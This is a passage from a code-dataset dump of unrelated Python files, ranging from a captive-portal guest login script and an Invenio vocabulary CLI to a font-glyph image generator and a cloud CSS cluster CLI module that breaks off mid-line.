+{"seq_id": "553559738", "text": "import time\r\nimport requests\r\n\r\n# Цикл проверки и авторизации сети\r\nwhile True:\r\n # Проверка подключения к сети\r\n try:\r\n r = requests.get('http://172.30.0.36:8000/')\r\n except:\r\n print('Подключитесь к сети')\r\n time.sleep(120)\r\n continue\r\n # Проверка авторизации в сети\r\n try:\r\n auto = requests.get('https://www.google.ru/?hl=ru')\r\n if auto.status_code == requests.codes.ok:\r\n print('Вы авторизированы !')\r\n # Авторизация в сети\r\n except:\r\n print('Отправка POST-запроса')\r\n data = {\r\n 'user': 'Guest',\r\n 'password': ''\r\n }\r\n requests.post('http://172.30.0.36:8000/api/captiveportal/access/logon/0/', data=data)", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 16, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "223713797", "text": "# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2020-2021 CERN.\n# Copyright (C) 2021 Graz University of Technology.\n#\n# Invenio-Vocabularies is free software; you can redistribute it and/or\n# modify it under the terms of the MIT License; see LICENSE file for more\n# details.\n\n\"\"\"Commands to create and manage vocabulary.\"\"\"\n\nimport csv\nfrom os.path import dirname, join\n\nimport click\nfrom flask.cli import with_appcontext\nfrom flask_principal import Identity\nfrom invenio_access import any_user\nfrom invenio_db import db\n\nfrom invenio_vocabularies.contrib.subjects.subjects import subject_record_type\nfrom invenio_vocabularies.records.models import VocabularyType\nfrom invenio_vocabularies.services.service import VocabulariesService\n\ndata_directory = join(dirname(__file__), \"data\")\n\n\ndef get_available_vocabularies():\n \"\"\"Specify the available vocabularies.\"\"\"\n return {\n \"licenses\": {\n \"path\": join(data_directory, \"licenses.csv\"),\n },\n \"subjects\": {\n \"path\": join(data_directory, \"subjects.csv\"),\n \"specific\": _create_subjects_vocabulary,\n },\n }\n\n\ndef _load_csv_data(path):\n with open(path) as f:\n reader = csv.DictReader(f, skipinitialspace=True)\n dicts = [row for row in reader]\n return dicts\n\n\ndef _create_subjects_vocabulary(vocabulary_type_name, source_path):\n identity = Identity(1)\n identity.provides.add(any_user)\n service = subject_record_type.service_cls()\n\n rows = _load_csv_data(source_path)\n\n records = []\n for row in rows:\n metadata = {\n \"title\": row[\"title\"],\n \"term\": row[\"id\"],\n \"identifier\": row[\"id\"],\n \"scheme\": row[\"scheme\"],\n }\n\n record = service.create(\n identity=identity,\n data={\n \"metadata\": metadata,\n },\n )\n\n records.append(record)\n\n return records\n\n\ndef _create_vocabulary(vocabulary_type_name, source_path):\n identity = Identity(1)\n identity.provides.add(any_user)\n service = VocabulariesService()\n\n # Load data\n rows = _load_csv_data(source_path)\n\n # Create vocabulary type\n vocabulary_type = VocabularyType(name=vocabulary_type_name)\n db.session.add(vocabulary_type)\n db.session.commit()\n\n i18n = [\"title\", \"description\"] # Attributes with i18n support\n other = [\"icon\"] # Other top-level attributes\n\n default_language = \"en\" # Static (dependent on the files)\n\n metadata = {\"title\": {}, \"description\": {}, \"props\": {}}\n\n records = []\n for row in rows:\n for attribute in row:\n value = row[attribute]\n if attribute in i18n:\n metadata[attribute][default_language] = value\n elif any(map(lambda s: value.startswith(s + \"_\"), i18n)):\n [prefix_attr, language] = attribute.split(\"_\", 1)\n metadata[prefix_attr][language] = value\n elif attribute in other:\n metadata[attribute] = value\n else:\n metadata[\"props\"][attribute] = value\n\n # Create record\n record = service.create(\n identity=identity,\n data={\n \"metadata\": metadata,\n \"vocabulary_type_id\": vocabulary_type.id,\n },\n )\n\n records.append(record)\n\n return records\n\n\n@click.group()\ndef vocabularies():\n \"\"\"Vocabularies command.\"\"\"\n pass\n\n\n@vocabularies.command(name=\"import\")\n@click.argument(\n \"vocabulary_types\",\n nargs=-1,\n type=click.Choice([v for v in get_available_vocabularies()]),\n)\n@with_appcontext\ndef load(vocabulary_types):\n \"\"\"Index CSV-based vocabularies in Elasticsearch.\"\"\"\n click.echo(\"creating vocabularies...\", color=\"blue\")\n\n for vocabulary_type in vocabulary_types:\n vocabulary = get_available_vocabularies()[vocabulary_type]\n if VocabularyType.query.filter_by(name=vocabulary_type).count() > 0:\n click.echo(\n \"vocabulary type {} already exists, skipping\".format(\n vocabulary_type\n ),\n color=\"red\",\n )\n continue\n\n click.echo(\n \"creating vocabulary type {}...\".format(vocabulary_type),\n color=\"blue\",\n )\n\n fun_create_vocabulary = vocabulary.get(\"specific\", _create_vocabulary)\n items = fun_create_vocabulary(vocabulary_type, vocabulary[\"path\"])\n\n click.echo(\n \"created {} vocabulary items successfully\".format(len(items)),\n color=\"green\",\n )\n click.echo(\"vocabularies created\", color=\"green\")\n", "sub_path": "invenio_vocabularies/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 4629, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 43, "usage_type": "call"}, {"api_name": "flask_principal.Identity", "line_number": 49, "usage_type": "call"}, {"api_name": "invenio_access.any_user", "line_number": 50, "usage_type": "argument"}, {"api_name": "invenio_vocabularies.contrib.subjects.subjects.subject_record_type.service_cls", "line_number": 51, "usage_type": "call"}, {"api_name": "invenio_vocabularies.contrib.subjects.subjects.subject_record_type", "line_number": 51, "usage_type": "name"}, {"api_name": "flask_principal.Identity", "line_number": 77, "usage_type": "call"}, {"api_name": "invenio_access.any_user", "line_number": 78, "usage_type": "argument"}, {"api_name": "invenio_vocabularies.services.service.VocabulariesService", "line_number": 79, "usage_type": "call"}, {"api_name": "invenio_vocabularies.records.models.VocabularyType", "line_number": 85, "usage_type": "call"}, {"api_name": "invenio_db.db.session.add", "line_number": 86, "usage_type": "call"}, {"api_name": "invenio_db.db.session", "line_number": 86, "usage_type": "attribute"}, {"api_name": "invenio_db.db", "line_number": 86, "usage_type": "name"}, {"api_name": "invenio_db.db.session.commit", "line_number": 87, "usage_type": "call"}, {"api_name": "invenio_db.db.session", "line_number": 87, "usage_type": "attribute"}, {"api_name": "invenio_db.db", "line_number": 87, "usage_type": "name"}, {"api_name": "click.group", "line_number": 124, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 139, "usage_type": "call"}, {"api_name": "invenio_vocabularies.records.models.VocabularyType.query.filter_by", "line_number": 143, "usage_type": "call"}, {"api_name": "invenio_vocabularies.records.models.VocabularyType.query", "line_number": 143, "usage_type": "attribute"}, {"api_name": "invenio_vocabularies.records.models.VocabularyType", "line_number": 143, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 144, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 152, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 160, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 164, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 131, "usage_type": "call"}, {"api_name": "click.Choice", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.cli.with_appcontext", "line_number": 136, "usage_type": "name"}]}
+{"seq_id": "653687015", "text": "\"\"\"\nt3 common module\n\"\"\"\n\nimport datetime\nimport os\nimport string\nfrom typing import Optional, Tuple\n\nfrom rmgpy.species import Species\n\nfrom arc.species.converter import molecules_from_xyz\n\nVERSION = '0.1.0'\n\nt3_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) # absolute path to the T3 folder\nDATA_BASE_PATH = os.path.join(t3_path, 'tests', 'data')\nSIMULATE_DATA_BASE_PATH = os.path.join(t3_path, 'tests', 'test_simulate_adapters', 'data')\nEXAMPLES_BASE_PATH = os.path.join(t3_path, 'examples')\nIPYTHON_SIMULATOR_EXAMPLES_PATH = os.path.join(t3_path, 'ipython', 'simulator_adapter_examples')\nPROJECTS_BASE_PATH = os.path.join(t3_path, 'Projects')\nVALID_CHARS = \"-_=.,%s%s\" % (string.ascii_letters, string.digits)\n\n\ndef get_species_by_label(label: str,\n species_list: list,\n ) -> Optional[Species]:\n \"\"\"\n Get a species from a list of species by its label.\n\n Args:\n label (str): A species label.\n species_list (list): Entries are RMG Species objects.\n\n Returns:\n Optional[Species]: The corresponding species from the species_list.\n Returns ``None`` if no species was found.\n \"\"\"\n for species in species_list:\n if species.label == label or species.to_chemkin() == label:\n return species\n if '(' in label and ')' in label:\n # try by the RMG species index\n for species in species_list:\n if species.index == int(label.split('(')[-1].split(')')[0]):\n return species\n return None\n\n\ndef dict_to_str(dictionary: dict,\n level: int = 0,\n ) -> str:\n \"\"\"\n A helper function to log dictionaries in a pretty way.\n\n Args:\n dictionary (dict): A general python dictionary.\n level (int): A recursion level counter, sets the visual indentation.\n\n Returns:\n str: A text representation for the dictionary.\n \"\"\"\n message = ''\n for key, value in dictionary.items():\n if isinstance(value, dict):\n message += ' ' * level * 2 + str(key) + ':\\n' + dict_to_str(value, level + 1)\n else:\n message += ' ' * level * 2 + str(key) + ': ' + str(value) + '\\n'\n return message\n\n\ndef delete_root_rmg_log(project_directory: str) -> None:\n \"\"\"\n Delete the 'RMG.log' file left in the root output directory, it's a left-over.\n\n Args:\n project_directory (str): The path to the root output folder.\n \"\"\"\n rmg_log_path = os.path.join(project_directory, 'RMG.log')\n if os.path.isfile(rmg_log_path):\n os.remove(rmg_log_path)\n\n\ndef get_rmg_species_from_a_species_dict(species_dict: dict,\n raise_error: bool = False,\n ) -> Optional[Species]:\n \"\"\"\n Get an RMG Species instance that corresponds to a species specified under the rmg.species\n section of the T3 input file (a species dictionary).\n\n Args:\n species_dict (dict): The species dictionary to process.\n raise_error (bool, optional): Whether to raise an error if a Species instance cannot be generated.\n Default: ``False``.\n\n Raises:\n ValueError: If the species dictionary does not have a specified structure (if ``raise_error`` is ``True``).\n\n Returns:\n Species: The corresponding RMG species instance.\n \"\"\"\n species = None\n errored = False\n if species_dict['adjlist'] is not None:\n species = Species(label=species_dict['label']).from_adjacency_list(species_dict['adjlist'])\n elif species_dict['smiles'] is not None:\n species = Species(label=species_dict['label'], smiles=species_dict['smiles'])\n elif species_dict['inchi'] is not None:\n species = Species(label=species_dict['label'], inchi=species_dict['inchi'])\n elif species_dict['xyz'] is not None:\n for xyz in species_dict['xyz']:\n mol_bo = molecules_from_xyz(xyz=xyz)[1]\n if mol_bo is not None:\n species = Species(label=species_dict['label']).from_adjacency_list(mol_bo.to_adjacency_list())\n break\n else:\n errored = True\n else:\n errored = True\n if errored and raise_error:\n raise ValueError(f\"The species corresponding to {species_dict['label']} does not have a specified structure.\")\n return species\n\n\ndef time_lapse(t0: datetime.datetime) -> datetime.timedelta:\n \"\"\"\n A helper function returning the elapsed time since t0.\n\n Args:\n t0 (datetime.datetime): The initial time the count starts from.\n\n Returns: datetime.timedelta\n The time difference between now and t0.\n \"\"\"\n return datetime.datetime.now() - t0\n\n\ndef convert_termination_time_to_seconds(termination_time: Tuple[float, str]):\n \"\"\"\n Converts the termination_time tuple from the RMG reactor to seconds.\n This is necessary for the RMS adapters since the Julia solver expects\n the integration bounds to be in units of seconds.\n\n Args:\n termination_time (Tuple[float, str]): Termination time for simulating in the RMG reactor. Example: [5, 'hours']\n\n Returns:\n t_final (float): The termination time in seconds.\n \"\"\"\n unit_conversion = {'micro-s': 1e-6,\n 'ms': 1e-3,\n 's': 1,\n 'hrs': 3600,\n 'hours': 3600,\n 'days': 3600*24,\n }\n t_final, units = termination_time\n t_final = t_final * unit_conversion[units]\n return t_final\n", "sub_path": "t3/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 5596, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.abspath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "string.ascii_letters", "line_number": 22, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 22, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 27, "usage_type": "name"}, {"api_name": "rmgpy.species.Species", "line_number": 27, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 81, "usage_type": "call"}, {"api_name": "rmgpy.species.Species", "line_number": 105, "usage_type": "call"}, {"api_name": "rmgpy.species.Species", "line_number": 107, "usage_type": "call"}, {"api_name": "rmgpy.species.Species", "line_number": 109, "usage_type": "call"}, {"api_name": "arc.species.converter.molecules_from_xyz", "line_number": 112, "usage_type": "call"}, {"api_name": "rmgpy.species.Species", "line_number": 114, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 86, "usage_type": "name"}, {"api_name": "rmgpy.species.Species", "line_number": 86, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 135, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 125, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 138, "usage_type": "name"}]}
+{"seq_id": "598440415", "text": "import time\nfrom random import randint, uniform\nfrom selenium import webdriver\nfrom itertools import repeat\n\n# Add odd shit here\nsite_list = [\"yahoo.com\"]\n\ndef site_select():\n i = randint(0, len(site_list) - 1)\n return (site_list[i])\n\nfirefox_profile = webdriver.FirefoxProfile()\nfirefox_profile.set_preference(\"browser.privatebrowsing.autostart\", True)\ndriver = webdriver.Firefox(firefox_profile=firefox_profile)\n\n# Visits a site, clicks a random number links, sleeps for random spans between\ndef visit_site():\n new_site = site_select()\n driver.get(new_site)\n print(\"Visiting: \" + new_site)\n time.sleep(uniform(1, 15))\n\n for i in repeat(None, randint(1, 3)) :\n try:\n links = driver.find_elements_by_css_selector('a')\n l = links[randint(0, len(links)-1)]\n time.sleep(1)\n print(\"clicking link\")\n l.click()\n time.sleep(uniform(0, 120))\n except Exception as e:\n print(\"Something went wrong with the link click.\")\n print(type(e))\n\nwhile(True):\n visit_site()\n time.sleep(uniform(4, 80))\n", "sub_path": "dirty_data.py", "file_name": "dirty_data.py", "file_ext": "py", "file_size_in_byte": 1111, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "random.randint", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver.FirefoxProfile", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 22, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 31, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "456632672", "text": "from django.urls import path\r\nfrom client import views\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\napp_name=\"client\"\r\nurlpatterns = [\r\n path('', views.home, name='home'),\r\n path('menu/', views.menu, name='menu'),\r\n path('profile/', views.profile, name='profile'),\r\n path('preview/', views.preview, name='preview'),\r\n path('submit/', views.submit, name='submit'),\r\n path('update/', views.update, name='update'),\r\n path('register/', views.SignUpPage, name='register'),\r\n path('login/', views.LoginPage, name='login'),\r\n path('logout/', views.logout_view, name='logout'),\r\n]\r\nurlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\r\n", "sub_path": "updated/StackHackBackend-main/client/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 714, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "client.views.home", "line_number": 8, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "client.views.menu", "line_number": 9, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "client.views.profile", "line_number": 10, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "client.views.preview", "line_number": 11, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "client.views.submit", "line_number": 12, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "client.views.update", "line_number": 13, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "client.views.SignUpPage", "line_number": 14, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "client.views.LoginPage", "line_number": 15, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "client.views.logout_view", "line_number": 16, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 18, "usage_type": "attribute"}]}
+{"seq_id": "172461544", "text": "import requests\n\nfrom backend.utils.requestutil import atbRequests\n\nclass TransactionRequest():\n\n def __init__(self, bank_id, acc_id):\n self.bank_id = bank_id\n self.acc_id = acc_id\n self.request_url = ''\n self.data = None\n atbR = atbRequests()\n self.request_token = atbR.generate_login_token()\n\n def transaction_request(self):\n atb_headers = {\n 'Authorization': 'DirectLogin token={}'.format(self.request_token)\n }\n self.request_url = 'https://api.leapos.ca/obp/v4.0.0/my/banks/{}/accounts/{}/transactions'.format(self.bank_id, self.acc_id)\n response = requests.get(self.request_url, headers=atb_headers)\n data = response.json()\n self.data = data\n return self.data\n\n def format_data(self):\n out_data = []\n for row in self.data.get('transactions'):\n f_data = {\n 'type': row.get('details').get('type'),\n 'timestamp': row.get('details').get('completed'),\n 'description': row.get('details').get('description'),\n 'balance': row.get('details').get('new_balance').get('amount'),\n 'change': row.get('details').get('value').get('amount')\n }\n out_data.append(f_data)\n return out_data", "sub_path": "backend/utils/transactionutil.py", "file_name": "transactionutil.py", "file_ext": "py", "file_size_in_byte": 1313, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "backend.utils.requestutil.atbRequests", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "514583348", "text": "from PIL import ImageFont, ImageDraw, Image\nimport os, shutil\nfrom time import time, gmtime, strftime\n\nclass Data:\n\n\n def ready_data(self, w, h, path, testing):\n\n # #check if folder exists if its doesn't create it and if it does\n # #delete and make it a new\n\n if not os.path.exists('fonts'):\n raise ValueError(\"please provide input directory of fonts\")\n\n\n if w<15 or h<15:\n raise ValueError(\"please provide height and weight >15\")\n\n\n if not os.path.exists(path):\n os.makedirs(path)\n print(\"path created\")\n\n\n # #populate array with .ttf files\n ttf = []\n print(\"populating data\")\n for root, dirs, files in os.walk(r'fonts'):\n if(testing==False):\n for file in files:\n if file.endswith('.ttf'):\n ttf.append(file)\n else:\n ttf.append(files[0])\n\n\n # #declare Width and Height Parameters\n\n self.build_data(ttf, w, h, path)\n\n def build_data(self, ttf, W, H, path):\n\n for i in range(0, ttf.__len__()):\n letter = 65\n\n font_name = str(ttf[int(i)])\n font_name = font_name[0:font_name.__len__() - 4]\n\n print(\"Drawing images for \"+font_name)\n for iter in range(0, 2):\n append = \"upper\"\n if(letter==97):\n append=\"lower\"\n\n for alpha in range(0, 26):\n\n im = Image.new(\"RGBA\", (W, H), (255, 255, 255))\n\n draw = ImageDraw.Draw(im)\n\n try:\n\n if not os.path.exists(os.path.join(path, font_name)):\n os.makedirs(os.path.join(path,font_name))\n\n font = ImageFont.truetype(os.path.join('fonts', ttf[int(i)]), H-10)\n\n w, h = draw.textsize(chr(alpha+letter), font=font)\n\n draw.text(((W-w)/2,((H-h)/2)-2), chr(letter+alpha), (0, 0, 0), font=font)\n\n im.save(os.path.join(path,font_name, font_name +\"_\"+append+ \"_\"+chr(letter+alpha)+\".png\"), 'png')\n\n except OSError:\n pass\n shutil.rmtree(os.path.join(path,font_name))\n letter = 97\n\n #uncomment below to have the manifold run\n #FontManifold\n\n\n\n\nif __name__ == '__main__':\n print(\"program starting at: \" + strftime(\" %H:%M:%S\", gmtime()))\n t0 = time()\n Data().ready_data(60, 60, \"test_data\", False)\n print(\"finished after \" + str((time() - t0) / 60.0) + \" minutes\")\n print(\"program program finished at: \" + strftime(\" %H:%M:%S\", gmtime()))", "sub_path": "data_sets.py", "file_name": "data_sets.py", "file_ext": "py", "file_size_in_byte": 2709, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 58, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 60, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 60, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 67, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 87, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 87, "usage_type": "call"}, {"api_name": "time.time", "line_number": 88, "usage_type": "call"}, {"api_name": "time.time", "line_number": 90, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 91, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "403101448", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n'''CSS ELK cluster v1 action implementations'''\nimport logging\n\nfrom osc_lib import utils\nfrom osc_lib.command import command\nfrom otcextensions.common import sdk_utils\n\nfrom otcextensions.i18n import _\n\nLOG = logging.getLogger(__name__)\n\ndef _flatten_output(obj):\n data = {\n 'id': obj.id,\n 'clusterId': obj.clusterId,\n 'name': obj.name,\n 'clustername': obj.clusterName,\n 'started': obj.started,\n 'size': obj.size,\n 'description': obj.description,\n 'status': obj.status,\n 'updated': obj.updated,\n }\n\n\"\"\"\ndef _flatten_output(obj):\n data = {\n 'id': obj.id,\n 'clusterid': obj.clusterId,\n 'name': obj.name,\n 'clustername': obj.clusterName,\n 'status': obj.status,\n 'created': obj.created,\n }\n\"\"\"\n\n\ndef _get_columns(item):\n column_map = {\n }\n return sdk_utils.get_osc_show_columns_for_sdk_resource(item, column_map)\n\n\nclass DeleteCluster(command.Command):\n _description = _('Delete CSS Cluster')\n\n def get_parser(self, prog_name):\n parser = super(DeleteCluster, self).get_parser(prog_name)\n parser.add_argument(\n 'cluster',\n metavar='',\n nargs='+',\n help=_('Name or ID of the tracker to delete.')\n )\n return parser\n\n def take_action(self, parsed_args):\n\n if parsed_args.cluster:\n client = self.app.client_manager.css\n for cluster in parsed_args.cluster:\n client.delete_cluster(cluster=cluster, ignore_missing=False)\n\n\nclass CreateSnapshot(command.ShowOne):\n _description = _('Create a single CSS snapshot')\n\n columns = (\n 'clusterid',\n 'name',\n 'clustername',\n 'status',\n 'created'\n # 'dimensions',\n # 'metric_name',\n # 'unit',\n )\n\n table_columns = (\n 'name',\n # 'dimensions.name',\n # 'dimensions.value',\n # 'metric_name',\n # 'unit',\n )\n\n def get_parser(self, prog_name):\n parser = super(CreateSnapshot, self).get_parser(prog_name)\n\n parser.add_argument(\n '--clusterid',\n metavar='',\n required=True,\n help=_('Specifies the CSS Cluster name OBS bucket name. The value is a string of '\n '0 to 64 characters and can contain uppercase and '\n 'lowercase letters (a to z and A to Z), digits (0 to '\n '9), hyphens (-), underscores (_), and periods (.). '\n 'In addition, it must start and end with a letter.')\n )\n\n parser.add_argument(\n '--name',\n metavar='',\n required=True,\n help=_('Specifies the CSS Cluster name OBS bucket name. The value is a string of '\n '0 to 64 characters and can contain uppercase and '\n 'lowercase letters (a to z and A to Z), digits (0 to '\n '9), hyphens (-), underscores (_), and periods (.). '\n 'In addition, it must start and end with a letter.')\n )\n parser.add_argument(\n '--description',\n metavar='',\n help=_('Specifies the prefix of a log that needs to be stored '\n 'in an OBS bucket. The value is a string of 0 to 64 '\n 'characters and can contain uppercase and lowercase '\n 'letters (a to z and A to Z), digits (0 to 9), '\n 'hyphens (-), underscores (_), and periods (.)')\n )\n parser.add_argument(\n '--indices',\n metavar='',\n help=_('Specifies whether SMN is supported. When the value is '\n '`false`, `topic_id` and `operations` can be left empty.')\n )\n return parser\n\n def take_action(self, parsed_args):\n\n client = self.app.client_manager.css\n\n attrs = {}\n\n if parsed_args.name:\n attrs['name'] = parsed_args.name\n if parsed_args.clusterid:\n attrs['clusterid'] = parsed_args.clusterid\n if parsed_args.description:\n attrs['description'] = parsed_args.description\n if parsed_args.indices:\n attrs['indices'] = parsed_args.indices\n\n obj = client.create_snapshot(**attrs)\n\n \"\"\"\n obj = list(obj)\n\n obj = obj[0][\"backup\"]\n\n table = (self.columns,\n (utils.get_dict_properties(\n _flatten_output(s), self.columns\n ) for s in obj))\n return table\n\n \"\"\"\n\n display_columns, columns = _get_columns(obj)\n data = utils.get_item_properties(obj, columns)\n\n return (display_columns, data)\n\n\nclass ShowCluster(command.ShowOne):\n _description = _('Show details of a CSS cluster')\n\n def get_parser(self, prog_name):\n parser = super(ShowCluster, self).get_parser(prog_name)\n parser.add_argument(\n 'cluster',\n metavar='',\n # default='system',\n help=_('Cluster name (currently only `system`)')\n )\n return parser\n\n def take_action(self, parsed_args):\n client = self.app.client_manager.css\n\n data = client.get_cluster(\n cluster=parsed_args.cluster,\n )\n\n display_columns, columns = 